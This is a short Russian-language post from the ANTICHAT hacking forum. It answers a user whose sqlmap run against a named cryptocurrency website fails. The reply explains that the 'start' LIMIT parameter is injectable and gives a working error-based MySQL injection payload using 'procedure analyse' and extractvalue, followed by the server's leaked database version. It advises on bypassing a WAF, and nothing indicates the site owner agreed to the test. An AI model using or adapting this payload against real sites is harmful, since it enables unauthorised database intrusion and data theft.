ANTICHAT - Показать сообщение отдельно - Ваши вопросы по уязвимостям.

Цитата:

Сообщение от caesarhunter

↑
https://www.europecoin.eu.org/planet...=desc&start=18
'
мап не крутит, вручную выдает ошибку 500
с этим что-то можно сделать?

Иньекция в limit, в запросе есть order by через union не выйдет. Можете через ошибку получить текущего пользователя, версию БД и название базы данных, стоит патч подзапросы не будут работать. Ну и есть не опасный waf, учтите это!

Код:

start=18 procedure analyse(extractvalue(0x0a,concat(0x0a,version())),1)-- -

XPATH syntax error: ' 5.5.60-0ubuntu0.14.04.1'